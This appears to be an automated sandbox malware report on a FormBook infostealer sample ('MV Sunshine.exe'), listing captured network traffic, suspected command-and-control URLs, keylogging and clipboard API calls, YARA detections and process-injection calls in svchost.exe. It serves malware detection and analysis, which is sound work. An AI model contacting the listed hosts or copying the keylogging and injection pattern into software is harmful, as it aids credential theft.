Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 04 Nov 2024 03:18:36 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 04 Nov 2024 03:18:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:19:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SIA9GZnlFhudPwXZQndyYrYNsfupUKYumARoUlSN8wE5Chi%2B0bQDJvT%2F%2FMNAg%2BaIPqMsY2I9%2F6astC2eksy8v0cDsw9MhBlX%2BW3b7iTxXFVN8eyruQIMD5pADkmpwBuXJZ32BTqkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd1765bc85c2cbf-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2018&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=753&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:19:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCeJVHCGv3M30bv799CF8zcwulU1GNqfypRHtZF%2F0xYglG%2FHh129wXLFJFlspT4XjQRwhHQ5TSUTyereqduBVMWYzk%2Ft1ELXgK1bYYy0KfWMgbwjbW59tVQR6EsekSQNysjIXTqoxw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd1766b7e242cd4-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=777&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:19:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nMQEMxH4UTR%2BZY4dVUouUJqLhazn%2FNyOFCdVEZhui2agJ2umkMhVJ%2BSg1XmCo3ASAT2Mzv%2BuVX5PRz17hUrNjNYCFuJwKGhLaW3ojgjuTCnkhWcbGujiINVsP0mbGJ07FNUMeOic%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd1767b6af66b89-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1790&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:19:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fG7n9%2Bu0FIuPzTVlV%2FpvWEq9ARaGefQum5ZjvvEL1POgkfovZHezIs6pXsMR2wnyWXMpgFpItQqcx9VoxFHw3xHjTb0lQ2F08Wm6fST1XYkQ5CG33OTFvbQE8qFkZOEN8LwyR1Lcpw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd1768b59f64784-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1298&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:19:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l6baZJzzX2UmV3qFgsKo3MvaJfWzOSc%2BG3aDN15HAtSIBa2C46%2FZ2lz2cewa3vSXAPr%2FsKPI2FlLJBt%2FW60TLQ%2F09%2BmH1WzuOJXAQpZB0KMrPX%2FI6wdB7ccTuW9V5FP0fB4w"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd176b27b720c13-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1448&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:19:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLxt91FKQYaossBhcTSFH9axYyWIvQgGR85yWCGzwStj2j8Wbj1l68cgQXW%2B7wJfJuwnc7ijtpCoKdLNiw3TXWcVXZDEvI%2BUGGiV17LPELDXu7Q5oBLRRUzcJ%2BpTlpKdqycj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd176c23da54620-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2034&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:19:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nuntpmlFUeSyJwkZzCzDJP472P1c0EphahmKfHQEcr3Ud1I4OOXwmsnUEwbykiLhOAUTZ6qqRjfsKSjIvcwHbI1YKO3MGl9HqhLIj0oZGgg3TnQv3TUR3uoxx2xtPH2Re5L%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd176d26ef0c871-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2151&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1778&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:19:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrgZM4S6CRP5lfJXe2KU%2BQ1K%2BgqEuARreAsUGFoSx%2BEZkmQL5mA4HA4hrg2s%2FUNXZb4eaXuK4GbQ%2FUT613XgXGJXWcuDWG3AcBja9aV%2B%2Fvo0tt3BLaMVH5fMyGizO%2B3uKbvI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd176e25f8e4618-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1202&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=485&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0

Source: find.exe, 00000004.00000002.3967280480.0000000003B86000.00000004.10000000.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000002.3966500688.00000000032E6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: find.exe, 00000004.00000002.3971076523.0000000005E90000.00000004.00000800.00020000.00000000.sdmp, find.exe, 00000004.00000002.3967280480.00000000044F2000.00000004.10000000.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000002.3966500688.0000000003C52000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.jigg.space/ezhm?gp=1&js=1&uuid=1730690345.0000715743&other_args=eyJ1cmkiOiAiL2V6aG0iLCAiY
Source: oVmFMrJhUAa.exe, 00000008.00000002.3968329130.00000000051FA000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.megaweb8.top
Source: oVmFMrJhUAa.exe, 00000008.00000002.3968329130.00000000051FA000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.megaweb8.top/9tmz/
Source: oVmFMrJhUAa.exe, 00000008.00000002.3966500688.0000000003C52000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www70.jigg.space/
Source: find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: find.exe, 00000004.00000002.3964890835.0000000002A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: find.exe, 00000004.00000002.3964890835.0000000002A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: find.exe, 00000004.00000003.2477042434.00000000078B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: find.exe, 00000004.00000002.3964890835.0000000002A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: find.exe, 00000004.00000002.3964890835.0000000002A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_0069425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0069425A

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00694458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00694458

Source: C:\Users\user\Desktop\MV Sunshine.exe

0_2_0069425A

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00680219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00680219

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_006ACDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_006ACDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3966156240.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2298353300.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3966567732.0000000002890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3966004188.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3968329130.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2298777568.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3964294017.0000000002840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2299487480.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00623B4C
Source: MV Sunshine.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: MV Sunshine.exe, 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5e1cc6bc-0
Source: MV Sunshine.exe, 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_6ec78226-e
Source: MV Sunshine.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_df2e6014-f
Source: MV Sunshine.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d549cf4b-e

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C7F3 NtClose,	2_2_0042C7F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B60 NtClose,LdrInitializeThunk,	2_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,	2_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874340 NtSetContextThread,	2_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874650 NtSuspendThread,	2_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B80 NtQueryInformationFile,	2_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BA0 NtEnumerateValueKey,	2_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BE0 NtQueryValueKey,	2_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BF0 NtAllocateVirtualMemory,	2_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AB0 NtWaitForSingleObject,	2_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AD0 NtReadFile,	2_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AF0 NtWriteFile,	2_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F90 NtProtectVirtualMemory,	2_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FA0 NtQuerySection,	2_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FB0 NtResumeThread,	2_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FE0 NtCreateFile,	2_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F30 NtCreateSection,	2_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F60 NtCreateProcessEx,	2_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E80 NtReadVirtualMemory,	2_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EA0 NtAdjustPrivilegesToken,	2_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EE0 NtQueueApcThread,	2_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E30 NtWriteVirtualMemory,	2_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DB0 NtEnumerateKey,	2_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DD0 NtDelayExecution,	2_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D00 NtSetInformationFile,	2_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D10 NtMapViewOfSection,	2_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D30 NtUnmapViewOfSection,	2_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CA0 NtQueryInformationToken,	2_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CC0 NtQueryVirtualMemory,	2_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CF0 NtOpenProcess,	2_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C00 NtQueryInformationProcess,	2_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C60 NtCreateKey,	2_2_03872C60
